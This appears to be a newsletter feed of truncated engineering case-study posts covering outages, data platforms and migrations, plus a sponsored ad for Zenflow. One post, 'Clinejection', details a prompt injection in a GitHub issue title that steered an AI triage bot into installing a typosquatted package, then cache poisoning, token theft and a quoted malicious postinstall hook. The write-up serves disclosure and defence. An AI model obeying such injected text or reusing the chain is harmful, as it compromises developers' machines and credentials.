Byte-Sized Design

HubSpot's 37-Minute Lesson in Why HTTP 200 Can Lie

Byte-Sized Design — Wed, 22 Apr 2026 16:34:15 GMT

TL;DR

3:43 PM EST to 4:20 PM EST. 37 minutes. Every HubSpot customer lost the ability to click into contact, company, order, or project workflows in the UI. Deal-based and ticket-based workflows still worked. Every backend automation kept firing on schedule. No data lost. No execution missed.

And the whole thing flew under the radar because the endpoint that broke kept returning HTTP 200.

The incident monitoring didn’t catch it. The automated canary checks didn’t catch it. A 60-minute alert threshold meant the tests that did fail weren’t going to page anyone until well after customers had already flooded support.

This is a textbook case of the thing we keep writing about: your observability is only as good as what you’re actually measuring. If you’re measuring “did the server respond,” you’re going to miss every bug that makes the server respond with the wrong answer. HubSpot’s post-mortem is refreshingly direct about this, and there’s a clean lesson in it for anyone running permission systems, feature flags, or anything else where the shape of a correct response matters more than its existence.

If you’ve been around for the Cloudflare July 2025 outage breakdown or the AWS October 20th dissection, this one will feel familiar. Different blast radius. Same category of failure.

So what actually happened?

HubSpot was rolling out a permissions framework update. The goal was reasonable: replace a broad shared scope with narrower, object-type-specific scopes for contact, company, order, and project workflows. Tighter permissions, better isolation. Standard stuff.

The rollout had two pieces:

Create the new permission scopes.
Promote the user role assignments that map those scopes to the right users.

Piece one made it to production. Piece two didn’t.

The staging environment had both pieces, so staging worked. Production had scopes without role assignments, so production’s access-control system went looking for user-role mappings that didn’t exist. When it couldn’t find them, it did what permission systems are supposed to do: fail closed. Deny access.

From the access-control system’s perspective, this was correct behavior. Users were asking about permissions the system couldn’t verify, so the system returned a restrictive access level.

From the user’s perspective, their workflows vanished.

The 200 that lied

Here’s the part worth dwelling on. The access endpoint returned HTTP 200 the whole time. The server didn’t crash. It didn’t throw. It didn’t log an error. It just returned a technically-valid response that said “this user can barely do anything.” The frontend, doing its job, saw “barely anything” and hid the UI.

Most monitoring treats HTTP status codes as ground truth. 2xx is fine, 4xx is the client’s problem, 5xx pages the on-call. It’s a useful abstraction, and it’s wrong in exactly this scenario. The server is healthy. The payload is garbage.

We covered something very similar in how Twitch caught their invisible failures—streams that terminated “successfully” from the server’s point of view while users saw nothing. Same failure mode, different domain. When correctness lives in the response body rather than the status line, your dashboards need to look inside the response.

Why the canary didn’t save them

HubSpot’s automated test suite did catch failures during the canary window. Those failures fired into a queue that was configured to wait 60 minutes before paging anyone.

Sixty minutes.

The deployment rolled out fully in 33 minutes. The entire incident lasted 37 minutes from first impact to rollback. The alerts would have arrived after the problem was already resolved.

Alert thresholds are a real tradeoff. Too tight and your on-call drowns in noise from flaky tests. Too loose and you get this. The right answer is rarely a single global threshold, it’s threshold in context. Failures during an active deployment window are categorically different from failures on a quiet Tuesday morning, and HubSpot is correctly calling that out in their remediation plan. Correlate the alerts with the deploys. Shrink the window to minutes during rollout.

This is the kind of instrumentation gap that shows up over and over in post-mortems. For more on how to actually write these documents well instead of just surviving them, our tech lead’s guide to writing post-mortems covers the framing that distinguishes a useful post-mortem from a corporate apology.

The split-brain deployment

Slack Rebuilt Notifications for Millions of Users

Byte-Sized Design — Mon, 30 Mar 2026 01:14:20 GMT

Notification overload is one of the top three reasons users contact Slack support. Not security incidents. Not data loss. Ping anxiety.

That stat is embarrassing for a company whose product is literally communication. But what’s interesting isn’t the problem, it’s why it was so hard to fix.

The system wasn’t broken. It was incoherent.

Desktop and mobile had entirely separate preference systems that had grown apart over years. “Nothing” on mobile meant something different from “Off” on desktop. Not slightly different. Architecturally different. One disabled push notifications. The other disabled in-app badges too. Users changing settings on one device had no predictable effect on the other.

This is how trust erodes. Not with crashes. With settings that don’t do what you think they do.

The core design flaw was a tight coupling between what notifies you and how you get notified. If you wanted fewer interruptions on mobile, your only lever also killed in-app awareness. There was no way to say “show me everything in the sidebar but only push me for mentions.” You had to pick between overload or ignorance.

Four preference systems became one

The old prefs looked like this:

desktop: everything | mentions | nothing   // Push on desktop
mobile:  everything | mentions | nothing   // Push on mobile

The word “nothing” is doing dishonest work there. Users who chose it thought they’d gone quiet. They hadn’t — they still got in-app badges. They just didn’t know it.

The new model decouples the two concerns cleanly:

desktop: everything | mentions // What activity to show
desktop_push_enabled: true | false // Whether to interrupt you
mobile: everything | mentions | nothing

desktop_push_enabled is new. Because it had no prior value in the database, the team could backfill every existing user based on whether they’d previously set “off”, no disruption, no migration emails, no support tickets. “Off” became “mentions with push disabled” at read time, which is exactly what it meant in practice anyway.

That’s a clean migration. Backwards compatible, rollback-safe, and behaviorally honest.

The real difficulty: millions of users, years of state

How Uber Killed Hours-Old Data (And Why Your Batch Jobs Are a Liability)

Byte-Sized Design — Tue, 24 Mar 2026 05:16:10 GMT

TLDR

Hours-old data. Petabyte scale. Thousands of engineers making decisions on stale numbers.

Uber’s data lake powers Delivery, Mobility, Finance, Marketing Analytics, and Machine Learning for a company with hundreds of millions of users. For years, the ingestion layer ran on Spark batch jobs. Data arrived in the lake hours late. Sometimes a full day late.

That was fine when the business moved slowly. It stopped being fine when data freshness became a competitive bottleneck—when model iteration speed, real-time experimentation, and operational analytics demanded minutes, not hours.

So they rebuilt ingestion from scratch on Apache Flink. The result: freshness dropped from hours to minutes, compute costs dropped 25%, and the system now handles petabyte-scale streaming across thousands of datasets.

This is IngestionNext. And the problems they had to solve to get there are exactly the kind of problems most data teams quietly ignore until they can’t anymore.

The Dirty Secret About Batch Ingestion

Here’s the thing nobody wants to say out loud: batch jobs are slow by design, and most teams have just accepted that as the cost of doing business.

You run a Spark job every hour. Maybe every 30 minutes if you’re ambitious. The job spins up, reads from Kafka or a transactional database, transforms the data, writes it to the lake. Then it tears down. An hour later, it does it all again.

At small scale this is totally fine. Predictable. Easy to debug. The operational overhead is low.

At Uber’s scale, hundreds of petabytes, thousands of datasets—those batch jobs were burning hundreds of thousands of CPU cores every day. Not because the work required that many cores. Because that’s how batch scheduling works. You provision for the peak, the peak is infrequent, and everything in between is wasted capacity.

And even if you ignore the cost problem, there’s no fixing the freshness problem. Batch is batch. If your job runs every hour, your data is up to an hour old. Period.

For model training, that’s a delay in experiment velocity. For fraud detection, that’s a window where bad actors operate undetected. For marketplace analytics, that’s a lag between what happened and when anyone can respond to it.

Uber looked at this and decided hours-old data was no longer acceptable. They needed minutes. That meant streaming.

If you want to see how Uber’s data lake got to 350PB in the first place, and the replication problems that scale created, read Inside Uber’s 350PB Data Lake: The Distcp Rewrite That 5x’d Performance.

Why Flink, Not Just “More Spark”

The obvious question: why not just run Spark Structured Streaming? It exists. It integrates with Kafka. Half the data ecosystem already knows how to use it.

Because Spark Structured Streaming still thinks in micro-batches. It’s better than full batch scheduling, but it’s not true streaming. You’re still dealing with the same fundamental model: accumulate records, process a chunk, commit.

Flink is a different mental model. It processes records as they arrive. Checkpoints are asynchronous, not tied to batch intervals. The state management is first-class. For continuous ingestion at this scale, Flink’s execution model is a better fit.

Uber already had Flink infrastructure. The ecosystem supported it. That made the decision easier, but the architecture challenges were anything but easy.

Pinterest went through a similar reckoning with Spark at scale, rebuilding their entire Hadoop-based platform into a container-native Spark system. Worth reading alongside this one: How Pinterest Runs Spark at Scale with Moka.

The Architecture

Events arrive in Kafka. Flink jobs consume them continuously and write to the data lake in Hudi format.

Hudi is doing serious work here. It provides transactional commits, rollback support, and time travel queries on top of what would otherwise be raw Parquet files on object storage. When a Flink job fails mid-write, Hudi rolls back the uncommitted data. When someone wants to query data as of a specific timestamp, Hudi handles it.

Above the data plane sits a control plane that manages the job lifecycle across thousands of datasets. Create, deploy, restart, stop, delete—all automated. Configuration changes propagate without manual intervention. Health checks run continuously. This isn’t glamorous infrastructure work, but at Uber’s scale, “we have 4,000 ingestion jobs” means operations without a control plane is a full-time fire drill.

There’s also regional failover. If a region goes dark, ingestion jobs reroute or fall back to batch mode. No data loss. No manual intervention required.

The architecture isn’t surprising. The interesting parts are the problems that showed up once it was running.

Problem 1: Streaming Creates a Small File Nightmare

GitHub’s Elasticsearch Problem Was Seven Years in the Making. Here’s How They Finally Fixed It

Byte-Sized Design — Mon, 16 Mar 2026 06:51:44 GMT

TL;DR

GitHub Enterprise Server runs search on Elasticsearch. It also runs High Availability with a primary/replica model. For years, those two things could not coexist cleanly. Elasticsearch would move a primary shard to the read-only replica node. If you then took down that replica for maintenance, the whole thing deadlocked. The replica waited for Elasticsearch to recover before it could start. Elasticsearch couldn’t recover until the replica rejoined.

GitHub engineers knew this was broken. They spent years trying to patch around it. It took until Elasticsearch shipped Cross Cluster Replication to actually fix it.

The fix is live in GHES 3.19.1. The lesson underneath it is older than GitHub.

The Original Sin Was a Reasonable Decision

Let’s be precise about what went wrong here, because it’s easy to read this story as “Elasticsearch bad” when the real issue is more interesting.

How a 12-Word Issue Title Owned 4,000 Developer Machines

Byte-Sized Design — Sat, 07 Mar 2026 08:20:05 GMT

TLDR

One GitHub issue title. Five steps. 4,000 compromised developer machines. Eight hours before anyone noticed.

The entry point wasn’t a zero-day. It wasn’t a misconfigured S3 bucket or a stolen password. It was natural language, a crafted string in an issue title that an AI triage bot read, interpreted as an instruction, and executed with full CI privileges.

This is Clinejection. It’s worth understanding in detail, because the attack surface it exposed isn’t unique to Cline. It’s in your repo too.

The Attack Chain Nobody Had a Playbook For

On February 17, 2026, someone published cline@2.3.0 to npm. The CLI binary was byte-identical to the previous version. The only change was one line in package.json:

json

"postinstall": "npm install -g openclaw@latest"

For the next eight hours, every developer who installed or updated Cline got OpenClaw—a separate AI agent with full system access—silently installed on their machine. About 4,000 downloads before the package was pulled.

Here’s how the attacker got the npm token to publish it.

Step 1: Prompt Injection Via Issue Title

Cline had deployed an AI-powered issue triage workflow using Anthropic’s claude-code-action. The workflow allowed any GitHub user to trigger it by opening an issue. The issue title was interpolated directly into Claude’s prompt:

yaml

${{ github.event.issue.title }}

No sanitisation. The attacker opened Issue #8904 with a title that looked like a performance report but contained an embedded instruction: install a package from a specific GitHub repository.

Claude read the issue title as part of the prompt. Claude followed the instruction. That’s prompt injection. It’s well-documented. It’s not new. It just hadn’t been weaponised against a CI workflow at this scale before.

Step 2: The Bot Executes Arbitrary Code

Claude ran npm install pointing to the attacker’s fork—a typosquatted repository named glthub-actions/cline. Note the missing ‘i’ in ‘github’. The fork’s package.json contained a preinstall script that fetched and executed a remote shell script.

This is where most engineers mentally say “we would catch that.” You wouldn’t. The bot ran with the privileges of the CI environment. There was no human in the loop. The operation looked like routine dependency installation.

Step 3: Cache Poisoning

The shell script deployed Cacheract—a GitHub Actions cache poisoning tool. It flooded the cache with over 10GB of data, triggering GitHub’s LRU eviction policy. The legitimate cache entries got evicted. The poisoned entries were keyed to match the pattern used by Cline’s nightly release workflow.

When that workflow ran and restored node_modules from cache, it got the compromised version.

Step 4: Credential Theft

The compromised node_modules ran during the release workflow—the one that held NPM_RELEASE_TOKEN, VSCE_PAT, and OVSX_PAT. All three exfiltrated.

Step 5: Malicious Publish

Using the stolen npm token, the attacker published cline@2.3.0 with the OpenClaw postinstall hook. The package was live for eight hours before StepSecurity’s automated monitoring flagged it—approximately 14 minutes after publication.

The Botched Rotation That Made It Worse

Security researcher Adnan Khan had discovered and reported the full vulnerability chain on January 1, 2026. He followed up multiple times over five weeks. No response.

When Khan publicly disclosed on February 9, Cline patched within 30 minutes by removing the AI triage workflows. They started credential rotation the next day.

Then they deleted the wrong token. The exposed one stayed active. They caught the error on February 11 and re-rotated—but the attacker had already exfiltrated the credentials, and the npm token remained valid long enough to publish six days later.

A separate, unknown actor had found Khan’s proof-of-concept on his test repository and weaponised it.

Why None of Your Existing Controls Would Have Caught This

Meta Used LLMs to Build Tests That Are Supposed to Fail

Byte-Sized Design — Tue, 24 Feb 2026 16:52:49 GMT

TLDR

Most test generation tries to make tests pass. Meta built a system where the whole point is to make them fail, on the code change you’re about to land, before it lands. Out of 41 engineer reach-o…

The Architect Is Not Being Replaced. The Architect Is Being Redefined.

Byte-Sized Design — Tue, 17 Feb 2026 09:35:43 GMT

TLDR

Klarna went from 7,400 to 3,000 employees and called it AI. Then quietly started rehiring. Google’s engineers now review more than 30% AI-written code. Uber’s AI agents saved 21,000 developer hours — using a LangGraph-based system they call “Validator.” Entry-level programmer employment in the US fell 27.5% between 2023 and 2025.

The junior engineer is already being displaced. The mid-level engineer is next.

But the software architect? That role isn’t shrinking. It’s becoming the most important job in the building. The question is whether architects understand what it now actually requires.

The AI-replaces-engineers narrative is mostly wrong and also not entirely wrong. The nuance is where it gets interesting.

Klarna is the most cited example. In 2024, the company’s OpenAI-powered chatbot handled 2.3 million customer conversations in its first month. By late 2024, their headcount was down 40% from peak. CEO Sebastian Siemiatkowski went on CNBC and said the quiet part out loud: AI did this. Then, in 2025, he quietly started rehiring. “We went too far,” he admitted. Customer satisfaction had cratered. The AI couldn’t handle nuance, empathy, or edge cases. The humans they’d shed were carrying context the model couldn’t learn from a training set.

The Klarna story isn’t a win for the pro-AI camp or the anti-AI camp. It’s a case study in where the boundary actually is right now. Structured, repetitive, high-volume interactions? AI wins. Unstructured, novel, high-stakes decisions that require organizational and human context? Humans still win. Not comfortably. Not permanently. But for now, yes.

Software architecture sits at exactly that boundary. And that’s why the next few years will either be the best time in history to be a senior architect — or the last generation of architects who learned the craft before AI ate the curriculum.

What Uber Actually Proved

The most concrete AI-augmentation-in-engineering story from the last 12 months isn’t from an AI company. It’s from Uber.

Uber’s Developer Platform team built an internal AI agent called Validator using LangGraph, the graph-based orchestration framework that reached general availability in May 2025. Validator doesn’t make product decisions. It doesn’t design services. It catches bad code before it ships — running linting, checking build validity, surfacing test design issues, doing the kind of thankless hygiene work that junior engineers traditionally owned.

Then they built Autocover on top of it. Same architecture. Autocover generates test cases automatically using domain-specific expert agents. Engineers trigger it from inside their IDE. It streams context-aware tests in real time. For large files, the system executes up to 100 tests concurrently.

Result: 10% increase in test coverage across the Developer Platform. 21,000 developer hours saved.

That’s not a small number. That’s equivalent to roughly 10 full-time engineers doing a year of grunt work, automated.

But here’s the part that didn’t make the headline: Uber found that deterministic agents — rule-based, hand-coded logic — outperformed LLMs for tasks like linting and build execution. The LLM wasn’t the hero of every scene. The architecture was. Someone at Uber had to decide what gets an LLM node, what gets a deterministic function node, and how the graph flows between them. That person is an architect.

The Real Job Description Is Changing

Inside Uber’s 350PB Data Lake: The Distcp Rewrite That 5x’d Performance

Byte-Sized Design — Wed, 11 Feb 2026 20:46:19 GMT

TLDR

250 TB to 1 PB per day. One quarter. Daily replication jobs jumped from 10,000 to 374,000. Uber’s data lake hit 350 PB and their copy tool couldn’t keep up. The P100 SLA of 4 hours became a joke.…

Knowing When to Stop Engineering: Airbnb’s Hardest Lesson

Byte-Sized Design — Sun, 01 Feb 2026 07:36:29 GMT

5x faster local builds. 3x faster IntelliJ syncs. 3x faster deploys to dev. Build satisfaction jumping from 38% to 68%.

Those are the numbers. They’re impressive. And it took Airbnb 4.5 years to get there.

With hindsight, they could have gotten there a lot sooner. Not by being smarter about Bazel. By being smarter about when to optimize.

Let’s get into it.

🚨 Why Gradle Was Killing Them

Gradle’s single-threaded configuration was a ticking clock. Large projects took minutes just to configure before a single line of code compiled. On CI, they were already vertically scaling to the biggest machines AWS offered. The sharding heuristics they built to split work across machines were leaking efficiency everywhere, machines sat half-idle while shared tasks duplicated across nodes.

But speed was only half the problem.

Gradle tasks had full access to the file system. Sounds fine until one engineer writes a cleanup task that wipes recent files in /tmp/. That task races with every other Gradle task using /tmp/. CI starts failing at scale. Thousands of tasks have to rerun. Nobody catches it until it’s already in production.

This was not a one-off. It was structural. Gradle gave tasks too much trust, and at the scale of tens of millions of lines of code, trust becomes a liability.

🔍 What Bazel Actually Fixed

Sandboxing killed the ghost dependencies. If a file isn’t declared as an input to a build action, it doesn’t exist. Period. That /tmp/ race condition? Can’t happen. Undeclared dependencies that work on your laptop but fail in CI? Gone.

Remote execution changed the math entirely. Instead of sharding builds across a handful of machines with heuristics, Bazel fanned out to thousands of parallel actions. RBE workers are short-lived — spin up, do work, die. No machine sits idle. No duplicated shared tasks. And Build without the Bytes meant only downloading the subset of outputs you actually need, not every cached artifact.

Starlark forced discipline. Bazel’s configuration language is constrained to be side-effect-free. That’s not a limitation, it’s what makes parallel analysis possible. Gradle’s configuration phase was single-threaded because it couldn’t be parallelized. Starlark’s constraints made it safe to be.

The results landed hard: 3–5x faster local builds, build satisfaction scores jumping from 38% to 68%, and CI times that actually made developers feel productive again.

🏗️ How They Actually Did It (The Parts That Matter)

What OpenAI Understood About Postgres That Most Teams Ignore

Byte-Sized Design — Sat, 24 Jan 2026 18:57:33 GMT

Every infrastructure architect on the planet will tell you the same thing: single-primary Postgres dies around 10 million users. Maybe 20 million if you’re really good.

OpenAI is at 800 million.

One primary database. 50 read replicas. Millions of queries per second.

And it just keeps working.

They Broke Every Rule We Have About Database Scaling

When ChatGPT launched and traffic went vertical, the playbook said: start sharding, migrate to Cassandra, or pray.

OpenAI looked at that playbook and said “nah.”

Here’s what they noticed: 95% of their traffic is reads. Updates happen, sure. But the overwhelming majority of requests are just fetching data.

Everyone panics about Postgres not scaling. But that’s mostly about writes. Nobody’s really pushed the boundaries on reads with a single writer.

Turns out you can go way, way further than anyone thought.

One Azure Postgres instance handling all writes. Nearly 50 replicas spread across regions handling reads. Double-digit millisecond p99 latency. Five nines uptime.

In the last 12 months? One SEV-0 incident. And that was during the ImageGen launch when 100 million people signed up in a week and writes spiked 10x overnight.

Write Traffic Is Where Postgres Falls Apart

Postgres uses something called MVCC. When you update a row, it doesn’t change it in place. It creates a whole new version and marks the old one as dead.

Update a user’s email? New row version. Update it again? Another new version.

All those dead versions sit there until autovacuum cleans them up. And under heavy write load:

Every update copies the entire row (write amplification)
Reads have to scan past dead versions to find the current one (read amplification)
Tables bloat
Indexes bloat
Autovacuum can’t keep up

This is why people say Postgres doesn’t scale. They’re hammering it with writes and hitting a ceiling.

OpenAI just stopped fighting that fight.

What They Did Instead

How Datadog taught an AI to investigate high-severity incidents

Byte-Sized Design — Tue, 20 Jan 2026 07:56:46 GMT

Most incident tools are good at collecting evidence.

They’re bad at thinking with it.

If you’ve ever been on call, you know the feeling:

12 dashboards open
Logs screaming
Traces half-useful
And one suspicious metric you can’t ignore

The hard part isn’t access to data.
It’s deciding what to look at next.

That’s the problem Bits AI SRE is actually trying to solve.

This isn’t an AI summarizer (and that matters)

The early wave of “AI for ops” tools made a quiet assumption:

If we gather enough telemetry, the model can summarize its way to the root cause.

That turns out to be wrong.

More data doesn’t make incidents clearer.
It makes them noisier.

Bits AI SRE does something different.
It investigates like a team of human SREs:

Form a hypothesis
Pull targeted evidence
Validate or reject
Go deeper only when the signal earns it

That sounds obvious.
It isn’t.

Most tools still dump everything into context and hope the model figures it out.

The key shift: causality over correlation

Here’s the most important design decision in this system:

The agent only looks at data that is causally related to a hypothesis.

Not “everything nearby.”
Not “everything noisy.”
Not “everything interesting.”

Just:

Does this explain why the alert fired?

In one real incident:

Kafka lag spiked
Commit latency spiked
Unrelated upstream errors were present

Earlier versions of the agent saw all of it
…and picked the wrong root cause.

The newer version ignored the noise and followed the causal chain:
commit latency → consumer lag → alert

That’s not an LLM trick.
That’s system design discipline.

Why benchmarking on real incidents is the quiet superpower

Processing Trillions: How Lyft's Feature Store Grew by 12%, 33% Faster, With Zero Custom DSLs

Byte-Sized Design — Mon, 12 Jan 2026 00:24:26 GMT

TL;DR

Lyft’s Feature Store serves 60+ production use cases and grew caller count by 25% last year. They cut P95 latency by a third while handling over a trillion additional R/W operations. The secret wasn’t fancy tech—it was treating ML infrastructure like a product with actual users who have better things to do than learn your system.

🎯 The Problem Nobody Talks About

Here’s what kills most ML platforms: the feature engineering tax.

Data scientists write a killer model. It works great in notebooks. Then they need to:

Rewrite feature logic for production (different language, different compute)
Debug why training features don’t match serving features
Wait 3 sprints for platform team to provision infrastructure
Maintain two separate codebases that drift apart

Six months later, the model’s still not deployed and everyone’s moved on to the next fire.

Lyft decided this was unacceptable. When you’re running a marketplace where every ML improvement directly impacts revenue, you can’t have your ML engineers stuck in infrastructure hell.

🏗️ Architecture That Doesn’t Get In The Way

The Three Feature Families

Lyft split their world into batch, streaming, and online. Not revolutionary, but the execution matters.

Batch features (the workhorse):

Customer writes SparkSQL query + simple JSON config
Python cron generates production Airflow DAG automatically
DAG handles compute, storage, quality checks, discovery—everything
Data lands in both Hive (offline training) and DynamoDB (online serving)

Streaming features (the real-time stuff):

Flink apps read from Kafka/Kinesis
Transform data, add metadata
Sink to spfeaturesingest service
Service handles serialization and writes to online store

Online serving (dsfeatures):

DynamoDB as source of truth
ValKey (Redis fork) write-through cache on top
OpenSearch for embeddings
Go and Python SDKs expose full CRUD

The smart part? Whether you write features via batch DAG, streaming app, or direct API call, they all land in the same online store with identical metadata. No “training/serving skew” headaches.

The Part That Actually Matters

Most feature stores fail because they’re too clever. Lyft succeeded because they made everything stupidly simple:

For feature creation:
SparkSQL query + JSON config. That’s it.

json

{
  "owner": "pricing-team",
  "urgency": "high",
  "refresh_cadence": "daily",
  "features": {...}
}

sql

SELECT 
  user_id,
  avg(ride_cost) as avg_ride_cost_30d
FROM rides
WHERE dt >= date_sub(current_date, 30)
GROUP BY user_id

No YAML hell. No custom DSLs. Just SQL and basic metadata.

For feature retrieval:
SDK method calls. Get() or BatchGet(). Returns data in whatever format your service speaks.

They optimized for the 90% use case: SQL-proficient engineers who want to ship fast and move on.

💡 What They Got Right

The Trillion-Event Platform: How Spotify Built a Data System That Doesn't Break

Byte-Sized Design — Sat, 27 Dec 2025 04:59:18 GMT

TL;DR

Spotify processes 1.4 trillion data points daily. Spotify grew from managing Europe’s largest Hadoop cluster to a 100+ engineer team running a full GCP-based platform. The key was when they stopped treating the data platform like infrastructure and started treating it like a product with real customers.

🎯 The Problem Space

Most companies hit the “we need a data platform” moment when their Slack is flooded with:

“Where’s that dataset again?”
“Why did this pipeline fail overnight?”
“Can someone explain why our numbers don’t match?”

Spotify hit all these triggers, but they also had a unique constraint: when your product is personalization, data isn’t a nice-to-have. It’s the entire business.

At scale, this meant:

1 trillion+ events per day flowing through event delivery
38,000+ scheduled pipelines running hourly and daily
1,800+ event types representing user interactions
Teams across payments, ML, experimentation, and product all needing reliable, fast access

🏗️ Architecture That Actually Scales

The Three-Pillar Model

The 2.1 Billion Problem: How a Single Integer Broke Heroku's API

Byte-Sized Design — Tue, 23 Dec 2025 07:08:39 GMT

TL;DR

Heroku’s API went dark for 4 hours because a foreign key used int32 while its primary key was int64. When the counter hit 2.1 billion, everything broke. The engineers ran a migration to fix it, which worked but cleared Postgres’s query statistics and made everything worse. Running apps stayed up; everything else died.

What Went Down

Somewhere in Heroku’s database, a primary key was happily incrementing as a bigint. A foreign key pointing to it was using a regular int.

This went unnoticed for years until the primary key exceeded 2.1 billion and the foreign key couldn’t keep up. Integer overflow. Auth system down. Customers locked out.

On-call engineers wrote a migration to upsize the foreign key to match. The migration ran successfully and new authorizations started working again. Crisis averted.

Except it wasn’t. Altering that column wiped Postgres’s internal statistics—the data the query optimizer uses to plan efficient queries. Without those stats, queries that normally took milliseconds started taking seconds. The partial outage became a complete API failure.

They put the API in read-only mode, fixed the statistics, monitored everything, and gradually brought the system back up. Total time down: just under 4 hours.

Senior Engineer Takeaways

How Salesforce Migrated 7 Years of Legacy in 4 Months Instead of 2 Years

Byte-Sized Design — Wed, 17 Dec 2025 17:20:46 GMT

Build Apps with Parallel Coding Agents With One Prompt

Imagine shipping backend services, UI components, refactors, tests, and full features — all from a single prompt, without manually writing specs, breaking down tasks, or stitching AI outputs together.

That’s the power of Zenflow (by Zencoder), a new way of building software with spec-driven AI workflows and parallel coding agents.

With Zenflow you get:

🧩 Spec-Driven Development (SDD)

Agents plan, gather requirements and build specs, always being anchored to evolving specs instead of random chats. They follow the same discipline your best engineers use.

🤝 Multi-Agent Verification

Agents cross-check each other’s work so you don’t have to. Drift and slop get caught before they ever reach you.

⚡ Parallelization at Scale

One engineer. A fleet of agents. Workflows that turn weeks into hours.

🖥️ AI-First UX

Kanban, tasks, subtasks, inbox - finally a UI built for managing AI work at scale.

🔄 Auto-Generated Task Flows

We break work into steps automatically. Less AI babysitting. More shipping.

🎯 Model Diversity

Different AI models challenge each other’s assumptions and catch blind spots.
Better accuracy, fewer surprises

Stop gambling with prompts. Start orchestrating.

GET STARTED FOR FREE

Salesforce’s Own Archive ran fine as a third-party managed package. By 2024, enterprise customers demanded native platform integration because compliance teams won’t sign off on external packages managing core archival data.

The problem? Seven years of undocumented Apex with static methods everywhere. Thousands of tightly coupled files. Deep dependency chains that made file-by-file translation impossible. And multi-tenant Core infrastructure that would choke on single-tenant static designs.

The fix? Dependency graph analysis to identify migration order. Leaf-to-root refactoring that built stable foundations first. Automated transformation with human-validated architectural patterns. And service-layer redesign that turned static spaghetti into scalable Java without breaking production.

🚨 The Breaking Points

Manual Migration Math Didn’t Work

Initial estimates: 2 years. The team had 275 Apex classes, 3,537 total files, and zero documentation on what half of them did. Engineers would need to:

Read every file to understand business logic
Manually rewrite Apex patterns into Java equivalents
Refactor static methods into multi-tenant service layers
Test each change against production behavior

Even small migrations took months. Scale that to thousands of interdependent files? The calendar said 2027 before customers saw value.

Dependency Hell Made Isolated Translation Impossible

You can’t just convert PaymentProcessor.apex to PaymentProcessor.java and call it done. That file calls UtilityHelpers, which references SharedConstants, which imports LegacyDataMapper. Convert one in isolation and you get:

Incomplete method signatures (where’s that utility method?)
Ambiguous return types (what does this constant actually mean?)
Code that compiles but behaves wrong at runtime

Translation order mattered. The system didn’t have one.

Static Methods Killed Multi-Tenancy

The managed package loved static classes and global shared state. Worked great when Customer A’s instance ran separately from Customer B’s. Breaks catastrophically in Core’s shared infrastructure where 50 customers hit the same code simultaneously.

Direct syntax conversion would reproduce single-tenant assumptions. Memory leaks. Isolation violations. Performance collapse under load. The architecture needed fundamental redesign, not just language translation.

🔍 Root Causes

1. Package-First Design Assumed Isolation

Seven years of development optimized for standalone deployment. Every architectural decision—static methods, global state, tight coupling—made sense in that context. Moving to shared multi-tenant infrastructure meant those same decisions became liabilities.

2. No Documentation, No Dependency Map

Legacy code accumulates logic faster than teams document it. Files referenced each other through years of incremental changes. Nobody had a complete picture of what depended on what. Manual analysis would take months before migration even started.

3. Manual Effort Doesn’t Scale to Thousands of Files

Rewriting code file-by-file works for small projects. At scale, it’s a coordination nightmare. Engineers step on each other. Changes ripple unpredictably. Regression risk compounds. The process itself becomes the bottleneck.

🧠 The Solution Architecture

1. Dependency Graph Analysis Revealed Migration Order

First step: Generate a complete dependency graph of the entire codebase. Map every class relationship. Identify which files depend on which.

This revealed natural layers:

Leaf nodes: Constants, utilities, helpers—no dependencies
Mid-level: Business logic that calls leaf nodes
Root nodes: Workflows that orchestrate everything

Migration order emerged automatically: Convert leaves first, then build upward.

The Cold Start Problem: You still need to understand what each file does. Solution: Start with the simplest leaf nodes (constants, basic utilities) that have obvious behavior. Use those as reference implementations when converting more complex files up the chain.

Result: Stable foundation. Each layer referenced only verified code from below. No guesswork about what upstream dependencies should look like.

2. Automated Transformation with Pattern-Based Rules

Defined transformation rules that encoded Core’s architectural patterns:

Convert static methods to service-layer classes
Replace global state with dependency injection
Separate concerns into clear object-oriented boundaries

Engineers reviewed output at each layer, adjusting rules as deeper refactoring needs surfaced. Not “let the machine write code unsupervised”—but “automate the mechanical translation, validate the architectural decisions.”

Critical constraint: Every generated file must compile and pass basic linting before moving to the next layer. Cascading errors break the pipeline.

3. Test Suite Redesign Instead of Direct Migration

Directly migrating Apex unit tests would reproduce legacy assumptions. Instead:

Extract logical intent from each test
Rewrite test suites in Java against new service boundaries
Validate behavior, not implementation details

Example: Old test checked that StaticProcessor.calculate() returned 42. New test validates that the payment service produces correct amounts regardless of implementation approach.

Result: Tests that verify the system works, not that it works the same way.

4. Layered Validation Beyond Automation

Code generation got the team 80% there. The remaining 20% required:

Manual end-to-end flow testing
Bug bash sessions with engineers outside the core team
Early deployment cycles that surfaced integration issues
Planned Selenium automation for UI regression coverage

Early cycles found many issues. Later phases found only a few. The release stabilized through systematic validation, not hope.

🧰 The Cascade of Benefits

Before: Manual file-by-file → 2 years → huge regression risk → blocked on engineer availability

After: Dependency-driven automation → 4 months → layered validation → same team manages 2x the code

Unlocked outcomes:

Native platform integration (compliance teams happy)
Unified deployment pipelines (security scanning built-in)
Consistent architectural patterns (easier to maintain)
Doubled codebase managed by same headcount (support both versions during transition)

🤔 Lessons Learned

1. Dependency Order Is Migration Strategy

You can’t translate interdependent code in random order. Graph analysis isa must have. Leaf-to-root migration prevents cascading errors and provides stable reference implementations at each layer.

2. Automation Requires Architectural Constraints

Pattern-based transformation only works when you define clear target patterns. “Convert this Apex to Java” is too vague. “Convert static methods to service classes with dependency injection following these specific conventions” gives automation something to execute.

3. Tests Validate Intent, Not Implementation

Migrating legacy tests 1:1 preserves old assumptions. Rewriting tests against new boundaries validates that the system solves the same problems, even if implementation differs. This catches architectural mismatches automation can’t see.

4. Scale Changes What’s Possible

Manual migration works for 10 files. Breaks at 100. Completely infeasible at 3,537. The volume itself forced process innovation—dependency graphs, automated transformation, layered validation. Sometimes constraints drive better solutions than greenfield freedom.

5. Human Validation Remains Non-Negotiable

Automated translation accelerated development. But functional correctness required systematic testing, manual review, and iterative refinement. Code that compiles isn’t code that works. Speed without validation just ships bugs faster.

🏗️ What Salesforce Built to Make This Work

Dependency graph generator for entire managed package
Leaf-to-root migration pipeline based on reference direction
Pattern-based transformation rules for Apex-to-Java conversion
Service-layer architecture with dependency injection
Test suite redesign focused on behavioral validation
Multi-phase bug bash process with cross-team participation
Infrastructure to maintain 14,000 files (legacy + new) simultaneously

🏁 Bottom Line

Salesforce didn’t migrate Own Archive because the old version was broken. They migrated because enterprise customers demand native platform integration, and compliance teams won’t approve external packages for core data flows.

For engineering leaders and architects:

